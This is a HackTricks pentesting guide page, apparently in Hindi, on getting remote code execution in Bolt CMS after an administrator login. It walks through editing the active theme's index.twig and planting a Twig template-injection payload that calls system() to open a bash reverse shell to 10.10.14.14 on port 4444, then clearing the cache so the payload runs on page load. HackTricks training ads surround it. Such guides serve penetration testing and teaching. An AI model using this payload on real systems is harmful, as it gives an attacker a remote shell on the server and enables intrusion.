HackTricksBolt CMS
Reading time: 2 minutes
tip
AWS हैकिंग सीखें और अभ्यास करें:
HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: 
HackTricks Training GCP Red Team Expert (GRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाएँ देखें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमारे Twitter 🐦 @hacktricks_live** का पालन करें।**
- हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।
RCE
प्रशासक के रूप में लॉगिन करने के बाद (लॉगिन प्रॉम्प्ट तक पहुँचने के लिए /bot पर जाएँ), आप Bolt CMS में RCE प्राप्त कर सकते हैं:
Configuration->View Configuration->Main Configurationचुनें या URL पथ/bolt/file-edit/config?file=/bolt/config.yamlपर जाएँ- थीम का मान जांचें
.png)
File management->View & edit templatesचुनें- पिछले चरण में पाए गए थीम बेस (इस मामले में
base-2021) का चयन करें औरindex.twigचुनें - मेरे मामले में यह URL पथ /bolt/file-edit/themes?file=/base-2021/index.twig में है
- इस फ़ाइल में अपने पेलोड को template injection (Twig) के माध्यम से सेट करें, जैसे:
{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}} - और परिवर्तनों को सहेजें
.png)
Maintenance->Clear the cacheमें कैश साफ़ करें- फिर से एक सामान्य उपयोगकर्ता के रूप में पृष्ठ तक पहुँचें, और पेलोड निष्पादित होना चाहिए
tip
AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाएँ देखें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमारे Twitter 🐦 @hacktricks_live** का पालन करें।**
- हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।